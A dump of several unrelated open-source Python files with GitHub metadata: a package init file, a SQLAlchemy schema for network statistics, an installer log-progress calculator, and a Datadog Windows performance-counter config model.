"size": "2507",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Pythonlogy/draft/Walkers/Mobilizer/__init__.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "86"
},
{
"name": "C++",
"bytes": "4244220"
},
{
"name": "CSS",
"bytes": "142769"
},
{
"name": "CoffeeScript",
"bytes": "37331"
},
{
"name": "HTML",
"bytes": "36211676"
},
{
"name": "JavaScript",
"bytes": "2147968"
},
{
"name": "Jupyter Notebook",
"bytes": "7930602"
},
{
"name": "Makefile",
"bytes": "6362"
},
{
"name": "PHP",
"bytes": "11096341"
},
{
"name": "Python",
"bytes": "5700092"
},
{
"name": "Ruby",
"bytes": "60"
},
{
"name": "Scala",
"bytes": "2412"
},
{
"name": "Shell",
"bytes": "2525"
},
{
"name": "Swift",
"bytes": "154"
},
{
"name": "TeX",
"bytes": "2556"
},
{
"name": "XSLT",
"bytes": "20993"
}
],
"symlink_target": ""
} |
"""
==========================
Cython-Accelerated Metrics
==========================
:Authors:
Moritz E. Beber
:Date:
2016-04-21
:Copyright:
Copyright |c| 2016, Moritz E. Beber, all rights reserved.
:File:
__init__.py
.. |c| unicode: U+A9
"""
from __future__ import absolute_import
from .spatial import *
| {
"content_hash": "cfb1a9ad8f99ac9b72269002a04f6250",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 61,
"avg_line_length": 15.523809523809524,
"alnum_prop": 0.5368098159509203,
"repo_name": "Midnighter/nadist",
"id": "44062d2561ef90b474878da4e6f1bf2fb11db39f",
"size": "352",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/nadist/cython/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1598"
},
{
"name": "C",
"bytes": "925"
},
{
"name": "Python",
"bytes": "29298"
}
],
"symlink_target": ""
} |
import logging
from sqlalchemy import Table, Column, Integer, String, DateTime, ForeignKey, Float, Numeric, Text
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, relationship
connection_string = ""
Base = declarative_base()
class SampleTimestamp(Base):
__tablename__ = "sample_timestamp"
id = Column(Integer, primary_key=True) # auto increment identifier
timestamp = Column(DateTime(timezone=False))
interval = Column(Numeric)
internet_address_association = Table("internet_address_association", Base.metadata,
Column("node_id", Integer, ForeignKey("node.id")),
Column("address_id", Integer, ForeignKey("internet_address.id")))
class Node(Base):
__tablename__ = "node"
id = Column(Integer, primary_key=True) # auto increment identifier
device_id = Column(String(23), nullable=False, unique=True) # Data path: 00:00:00:00:00:00:00:00
# datetime information
created = Column(DateTime(timezone=False))
last_seen = Column(DateTime(timezone=False))
type = Column(String(50))
connected_since = Column(DateTime(timezone=False))
ports = relationship("Port")
addresses = relationship("InternetAddress", secondary=internet_address_association, backref="nodes")
samples = relationship("NodeSample", backref="node")
# Compare logic http://regebro.wordpress.com/2010/12/13/python-implementing-rich-comparison-the-correct-way/
def _compare(self, other, method):
return method(self.device_id, other.device_id)
def __lt__(self, other):
return self._compare(other, lambda s, o: s < o)
def __le__(self, other):
return self._compare(other, lambda s, o: s <= o)
def __eq__(self, other):
return self._compare(other, lambda s, o: s == o)
def __ge__(self, other):
return self._compare(other, lambda s, o: s >= o)
def __gt__(self, other):
return self._compare(other, lambda s, o: s > o)
def __ne__(self, other):
return self._compare(other, lambda s, o: s != o)
class NodeSample(Base):
__tablename__ = "node_sample"
id = Column(Integer, primary_key=True) # auto increment identifier
sampled = Column(DateTime(timezone=False))
closeness = Column(Float)
betweenness = Column(Float)
degree = Column(Integer)
node_id = Column(Integer, ForeignKey("node.id"))
class InternetAddress(Base):
__tablename__ = "internet_address"
id = Column(Integer, primary_key=True) # auto increment identifier
created = Column(DateTime(timezone=False))
address = Column(String(50))
class Flow(Base):
__tablename__ = "flow"
id = Column(Integer, primary_key=True) # auto increment identifier
created = Column(DateTime(timezone=False))
cookie = Column(Numeric)
data_layer_destination = Column(String(17))
data_layer_source = Column(String(17))
data_layer_type = Column(Integer)
data_layer_virtual_lan = Column(Numeric)
data_layer_virtual_lan_priority_code_point = Column(Numeric)
input_port = Column(Numeric)
network_destination = Column(String(15))
network_destination_mask_len = Column(Integer)
network_protocol = Column(Integer)
network_source = Column(String(15))
network_source_mask_len = Column(Integer)
network_type_of_service = Column(Integer)
transport_destination = Column(Numeric)
transport_source = Column(Numeric)
wildcards = Column(Numeric)
node_id = Column(Integer, ForeignKey("node.id"))
node = relationship(Node)
samples = relationship("FlowSample", backref="flow")
class FlowSample(Base):
__tablename__ = "flow_sample"
id = Column(Integer, primary_key=True) # auto increment identifier
sampled = Column(DateTime(timezone=False))
packet_count = Column(Integer)
byte_count = Column(Integer)
duration_seconds = Column(Integer)
priority = Column(Numeric)
idle_timeout_sec = Column(Numeric)
hard_timeout_sec = Column(Numeric)
flow_id = Column(Integer, ForeignKey("flow.id"))
class Link(Base):
__tablename__ = "link"
id = Column(Integer, primary_key=True) # auto increment identifier
# datetime information
created = Column(DateTime(timezone=False))
last_seen = Column(DateTime(timezone=False))
direction = Column(String(50))
type = Column(String(50))
# source
src_id = Column(Integer, ForeignKey("node.id"), nullable=False)
src_port = Column(Integer)
src = relationship("Node", foreign_keys=[src_id])
# destination
dst_id = Column(Integer, ForeignKey("node.id"), nullable=False)
dst_port = Column(Integer)
dst = relationship("Node", foreign_keys=[dst_id])
samples = relationship("LinkSample")
class LinkSample(Base):
__tablename__ = "link_sample"
id = Column(Integer, primary_key=True) # auto increment identifier
sampled = Column(DateTime(timezone=False))
betweenness = Column(Float)
src_packet_loss = Column(Float)
dst_packet_loss = Column(Float)
src_transmit_data_rate = Column(Integer)
src_receive_data_rate = Column(Integer)
dst_transmit_data_rate = Column(Integer)
dst_receive_data_rate = Column(Integer)
src_delay = Column(Float)
dst_delay = Column(Float)
link_id = Column(Integer, ForeignKey("link.id"))
link = relationship(Link)
class Port(Base):
__tablename__ = "port"
id = Column(Integer, primary_key=True) # auto increment identifier
hardware_address = Column(String(17), nullable=False) # MAC: 00:00:00:00:00:00
port_number = Column(Integer)
name = Column(String(50))
# datetime information
created = Column(DateTime(timezone=False))
last_seen = Column(DateTime(timezone=False))
samples = relationship("PortSample")
node_id = Column(Integer, ForeignKey("node.id"))
node = relationship(Node)
class PortSample(Base):
__tablename__ = "port_sample"
id = Column(Integer, primary_key=True) # auto increment identifier
sampled = Column(DateTime(timezone=False))
receive_packets = Column(Numeric)
transmit_packets = Column(Numeric)
receive_bytes = Column(Numeric)
transmit_bytes = Column(Numeric)
receive_dropped = Column(Numeric)
transmit_dropped = Column(Numeric)
receive_errors = Column(Numeric)
transmit_errors = Column(Numeric)
receive_frame_errors = Column(Numeric)
receive_overrun_errors = Column(Numeric)
receive_crc_errors = Column(Numeric)
collisions = Column(Numeric)
port_id = Column(Integer, ForeignKey("port.id"))
port = relationship(Port)
class Report(Base):
__tablename__ = "report"
id = Column(Integer, primary_key=True) # auto increment identifier
created = Column(DateTime(timezone=False))
type = Column(String(100))
sample_interval = Column(Numeric)
sample_start = Column(DateTime(timezone=False))
sample_stop = Column(DateTime(timezone=False))
sample_count = Column(Numeric)
execution_duration = Column(Numeric)
content = Column(Text)
def get_session():
engine = create_engine(connection_string)
Base.metadata.bind = engine
session = sessionmaker(bind=engine)()
return session
def start(conn_string):
global connection_string
connection_string = conn_string
def init():
logging.debug("Create store database via ORM.")
engine = create_engine(connection_string)
Base.metadata.create_all(engine)
def drop():
logging.debug("Drop store database via ORM.")
engine = create_engine(connection_string)
Base.metadata.drop_all(engine) | {
"content_hash": "af400703e85e4c9985d3be78e8c1416d",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 112,
"avg_line_length": 30.172549019607843,
"alnum_prop": 0.6785807122433065,
"repo_name": "UdS-TelecommunicationsLab/SDNalytics",
"id": "b61b3c7d7b9c572bbca51c7f4a6df7891c5ffcf0",
"size": "8983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sdnalyzer/store.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "93935"
}
],
"symlink_target": ""
} |
"""module to provide updating installing process function.
.. moduleauthor:: Xiaodong Wang <[email protected]>
"""
import logging
from compass.log_analyzor.line_matcher import LineMatcher, IncrementalProgress
from compass.log_analyzor.file_matcher import FileMatcher
from compass.log_analyzor.adapter_matcher import AdapterMatcher
from compass.log_analyzor.adapter_matcher import AdapterItemMatcher
from compass.log_analyzor.adapter_matcher import OSMatcher
from compass.log_analyzor.adapter_matcher import PackageMatcher
# TODO(weidong): reconsider intialization method for the following.
OS_INSTALLER_CONFIGURATIONS = {
'CentOS': AdapterItemMatcher(
file_matchers=[
FileMatcher(
filename='sys.log',
min_progress=0.0,
max_progress=0.1,
line_matchers={
'start': LineMatcher(
pattern=r'NOTICE (?P<message>.*)',
progress=IncrementalProgress(.1, .9, .1),
message_template='%(message)s',
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='exit'
),
}
),
FileMatcher(
filename='anaconda.log',
min_progress=0.1,
max_progress=1.0,
line_matchers={
'start': LineMatcher(
pattern=r'setting.*up.*kickstart',
progress=.1,
message_template=(
'Setting up kickstart configurations'),
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='STEP_STAGE2'
),
'STEP_STAGE2': LineMatcher(
pattern=r'starting.*STEP_STAGE2',
progress=.15,
message_template=(
'Downloading installation '
'images from server'),
unmatch_nextline_next_matcher_name='STEP_STAGE2',
match_nextline_next_matcher_name='start_anaconda'
),
'start_anaconda': LineMatcher(
pattern=r'Running.*anaconda.*script',
progress=.2,
unmatch_nextline_next_matcher_name=(
'start_anaconda'),
match_nextline_next_matcher_name=(
'start_kickstart_pre')
),
'start_kickstart_pre': LineMatcher(
pattern=r'Running.*kickstart.*pre.*script',
progress=.25,
unmatch_nextline_next_matcher_name=(
'start_kickstart_pre'),
match_nextline_next_matcher_name=(
'kickstart_pre_done')
),
'kickstart_pre_done': LineMatcher(
pattern=(
r'All.*kickstart.*pre.*script.*have.*been.*run'),
progress=.3,
unmatch_nextline_next_matcher_name=(
'kickstart_pre_done'),
match_nextline_next_matcher_name=(
'start_enablefilesystem')
),
'start_enablefilesystem': LineMatcher(
pattern=r'moving.*step.*enablefilesystems',
progress=0.3,
message_template=(
'Performing hard-disk partitioning and '
'enabling filesystems'),
unmatch_nextline_next_matcher_name=(
'start_enablefilesystem'),
match_nextline_next_matcher_name=(
'enablefilesystem_done')
),
'enablefilesystem_done': LineMatcher(
pattern=r'leaving.*step.*enablefilesystems',
progress=.35,
message_template='Filesystems are enabled',
unmatch_nextline_next_matcher_name=(
'enablefilesystem_done'),
match_nextline_next_matcher_name=(
'setup_repositories')
),
'setup_repositories': LineMatcher(
pattern=r'moving.*step.*reposetup',
progress=0.35,
message_template=(
'Setting up Customized Repositories'),
unmatch_nextline_next_matcher_name=(
'setup_repositories'),
match_nextline_next_matcher_name=(
'repositories_ready')
),
'repositories_ready': LineMatcher(
pattern=r'leaving.*step.*reposetup',
progress=0.4,
message_template=(
'Customized Repositories setting up are done'),
unmatch_nextline_next_matcher_name=(
'repositories_ready'),
match_nextline_next_matcher_name='checking_dud'
),
'checking_dud': LineMatcher(
pattern=r'moving.*step.*postselection',
progress=0.4,
message_template='Checking DUD modules',
unmatch_nextline_next_matcher_name='checking_dud',
match_nextline_next_matcher_name='dud_checked'
),
'dud_checked': LineMatcher(
pattern=r'leaving.*step.*postselection',
progress=0.5,
message_template='Checking DUD modules are done',
unmatch_nextline_next_matcher_name='dud_checked',
match_nextline_next_matcher_name='installing_packages'
),
'installing_packages': LineMatcher(
pattern=r'moving.*step.*installpackages',
progress=0.5,
message_template='Installing packages',
unmatch_nextline_next_matcher_name=(
'installing_packages'),
match_nextline_next_matcher_name=(
'packages_installed')
),
'packages_installed': LineMatcher(
pattern=r'leaving.*step.*installpackages',
progress=0.8,
message_template='Packages are installed',
unmatch_nextline_next_matcher_name=(
'packages_installed'),
match_nextline_next_matcher_name=(
'installing_bootloader')
),
'installing_bootloader': LineMatcher(
pattern=r'moving.*step.*instbootloader',
progress=0.9,
message_template='Installing bootloaders',
unmatch_nextline_next_matcher_name=(
'installing_bootloader'),
match_nextline_next_matcher_name=(
'bootloader_installed'),
),
'bootloader_installed': LineMatcher(
pattern=r'leaving.*step.*instbootloader',
progress=1.0,
message_template='bootloaders is installed',
unmatch_nextline_next_matcher_name=(
'bootloader_installed'),
match_nextline_next_matcher_name='exit'
),
}
),
FileMatcher(
filename='install.log',
min_progress=0.56,
max_progress=0.80,
line_matchers={
'start': LineMatcher(
pattern=r'Installing (?P<package>.*)',
progress=IncrementalProgress(0.0, 0.99, 0.005),
message_template='Installing %(package)s',
unmatch_sameline_next_matcher_name='package_complete',
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='start'
),
'package_complete': LineMatcher(
pattern='FINISHED.*INSTALLING.*PACKAGES',
progress=1.0,
message_template='installing packages finished',
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='exit'
),
}
),
]
),
}
PACKAGE_INSTALLER_CONFIGURATIONS = {
'openstack': AdapterItemMatcher(
file_matchers=[
FileMatcher(
filename='chef-client.log',
min_progress=0.1,
max_progress=1.0,
line_matchers={
'start': LineMatcher(
pattern=(
r'Processing\s*(?P<install_type>.*)'
r'\[(?P<package>.*)\].*'),
progress=IncrementalProgress(0.0, .90, 0.005),
message_template=(
'Processing %(install_type)s %(package)s'),
unmatch_sameline_next_matcher_name=(
'chef_complete'),
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='start'
),
'chef_complete': LineMatcher(
pattern=r'Chef.*Run.*complete',
progress=1.0,
message_template='Chef run complete',
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='exit'
),
}
),
]
),
}
ADAPTER_CONFIGURATIONS = [
AdapterMatcher(
os_matcher=OSMatcher(
os_installer_name='cobbler',
os_pattern='CentOS.*',
item_matcher=OS_INSTALLER_CONFIGURATIONS['CentOS'],
min_progress=0.0,
max_progress=0.6),
package_matcher=PackageMatcher(
package_installer_name='chef',
target_system='openstack',
item_matcher=PACKAGE_INSTALLER_CONFIGURATIONS['openstack'],
min_progress=0.6,
max_progress=1.0)
)
]
def _get_adapter_matcher(os_installer, os_name,
package_installer, target_system):
"""Get adapter matcher by os name and package installer name."""
for configuration in ADAPTER_CONFIGURATIONS:
if configuration.match(os_installer, os_name,
package_installer, target_system):
return configuration
logging.error('No configuration found with os installer %s os %s '
'package_installer %s, target_system %s',
os_installer, os_name, package_installer, target_system)
return None
def update_progress(os_installer, os_name, package_installer, target_system,
clusterid, hostids):
"""Update adapter installing progress.
:param os_installer: os installer name
:param os_name: os name.
:param package_installer: package installer name.
:param clusterid: cluster id.
:param hostids: hosts ids.
"""
adapter = _get_adapter_matcher(os_installer, os_name,
package_installer, target_system)
if not adapter:
return
adapter.update_progress(clusterid, hostids)
| {
"content_hash": "80f7c62130b901aae78540abcc0bd890",
"timestamp": "",
"source": "github",
"line_count": 278,
"max_line_length": 78,
"avg_line_length": 44.62589928057554,
"alnum_prop": 0.46525874576817666,
"repo_name": "SysCompass/compass",
"id": "776f1f4107e46ca88c5e7ef7f184552a129b16ba",
"size": "12406",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "compass/log_analyzor/progress_calculator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "396811"
},
{
"name": "Shell",
"bytes": "28158"
}
],
"symlink_target": ""
} |
from __future__ import annotations
from typing import Literal, Mapping, Optional, Sequence, Union
from pydantic import BaseModel, Extra, Field, root_validator, validator
from datadog_checks.base.utils.functions import identity
from datadog_checks.base.utils.models import validation
from . import defaults, validators
class Counter(BaseModel):
class Config:
extra = Extra.allow
allow_mutation = False
aggregate: Optional[Union[bool, Literal['only']]]
average: Optional[bool]
metric_name: Optional[str]
name: Optional[str]
type: Optional[str]
class InstanceCounts(BaseModel):
class Config:
allow_mutation = False
monitored: Optional[str]
total: Optional[str]
unique: Optional[str]
class ExtraMetrics(BaseModel):
class Config:
allow_mutation = False
counters: Sequence[Mapping[str, Union[str, Counter]]]
exclude: Optional[Sequence[str]]
include: Optional[Sequence[str]]
instance_counts: Optional[InstanceCounts]
name: str
tag_name: Optional[str]
use_localized_counters: Optional[bool]
class MetricPatterns(BaseModel):
class Config:
allow_mutation = False
exclude: Optional[Sequence[str]]
include: Optional[Sequence[str]]
class Counter1(BaseModel):
class Config:
extra = Extra.allow
allow_mutation = False
aggregate: Optional[Union[bool, Literal['only']]]
average: Optional[bool]
metric_name: Optional[str]
name: Optional[str]
type: Optional[str]
class InstanceCounts1(BaseModel):
class Config:
allow_mutation = False
monitored: Optional[str]
total: Optional[str]
unique: Optional[str]
class Metrics(BaseModel):
class Config:
allow_mutation = False
counters: Sequence[Mapping[str, Union[str, Counter1]]]
exclude: Optional[Sequence[str]]
include: Optional[Sequence[str]]
instance_counts: Optional[InstanceCounts1]
name: str
tag_name: Optional[str]
use_localized_counters: Optional[bool]
class InstanceConfig(BaseModel):
class Config:
allow_mutation = False
disable_generic_tags: Optional[bool]
empty_default_hostname: Optional[bool]
enable_health_service_check: Optional[bool]
extra_metrics: Optional[Mapping[str, ExtraMetrics]]
metric_patterns: Optional[MetricPatterns]
metrics: Mapping[str, Metrics]
min_collection_interval: Optional[float]
namespace: Optional[str] = Field(None, regex='\\w*')
password: Optional[str]
server: Optional[str]
server_tag: Optional[str]
service: Optional[str]
tags: Optional[Sequence[str]]
use_legacy_check_version: Optional[bool]
username: Optional[str]
@root_validator(pre=True)
def _initial_validation(cls, values):
return validation.core.initialize_config(getattr(validators, 'initialize_instance', identity)(values))
@validator('*', pre=True, always=True)
def _ensure_defaults(cls, v, field):
if v is not None or field.required:
return v
return getattr(defaults, f'instance_{field.name}')(field, v)
@validator('*')
def _run_validations(cls, v, field):
if not v:
return v
return getattr(validators, f'instance_{field.name}', identity)(v, field=field)
@root_validator(pre=False)
def _final_validation(cls, values):
return validation.core.finalize_config(getattr(validators, 'finalize_instance', identity)(values))
| {
"content_hash": "8c8d2c8be8b7c66a66d3a9d631470b1d",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 110,
"avg_line_length": 26.992248062015506,
"alnum_prop": 0.6872487076392878,
"repo_name": "DataDog/integrations-core",
"id": "6eb6abfa206dd7aef4201819b67d4a47dbdb4adb",
"size": "3839",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "windows_performance_counters/datadog_checks/windows_performance_counters/config_models/instance.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "578"
},
{
"name": "COBOL",
"bytes": "12312"
},
{
"name": "Dockerfile",
"bytes": "22998"
},
{
"name": "Erlang",
"bytes": "15518"
},
{
"name": "Go",
"bytes": "6988"
},
{
"name": "HCL",
"bytes": "4080"
},
{
"name": "HTML",
"bytes": "1318"
},
{
"name": "JavaScript",
"bytes": "1817"
},
{
"name": "Kotlin",
"bytes": "430"
},
{
"name": "Lua",
"bytes": "3489"
},
{
"name": "PHP",
"bytes": "20"
},
{
"name": "PowerShell",
"bytes": "2398"
},
{
"name": "Python",
"bytes": "13020828"
},
{
"name": "Roff",
"bytes": "359"
},
{
"name": "Ruby",
"bytes": "241"
},
{
"name": "Scala",
"bytes": "7000"
},
{
"name": "Shell",
"bytes": "83227"
},
{
"name": "Swift",
"bytes": "203"
},
{
"name": "TSQL",
"bytes": "29972"
},
{
"name": "TypeScript",
"bytes": "1019"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.